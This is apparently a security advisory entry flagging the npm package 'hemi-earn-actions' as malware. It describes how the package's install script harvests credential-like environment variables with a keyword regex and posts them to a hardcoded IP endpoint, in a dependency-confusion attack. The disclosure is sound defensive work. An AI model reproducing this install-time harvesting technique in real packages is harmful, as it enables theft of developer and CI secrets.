MAL-2026-5778

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a9c2a72c75e835bc78738de0839bd4727df93d6bcb8aed2215289973996c4f3c) On `npm install`, the package's preinstall script (postinstall.js) collects host metadata (hostname, username, cwd, npm config) and iterates process.env, filtering keys against the regex /key|secret|token|pass|private|ssh|deploy|auth|api|rpc|wallet|sentry|docker|graph|slack|host/i to harvest credential-shaped variables. The resulting JSON payload is POSTed over HTTPS to a hardcoded bare-IP endpoint, https://185.130.46.35:8443/collect. The package itself has no functional API — index.js is `module.exports = {}` — and the version `999.0.0` plus the description 'Internal package' fit the dependency-confusion pattern aimed at organizations that resolve a private name `hemi-earn-actions` from the public registry. Installer harm is automatic credential exfiltration of CI/developer secrets to attacker-controlled infrastructure.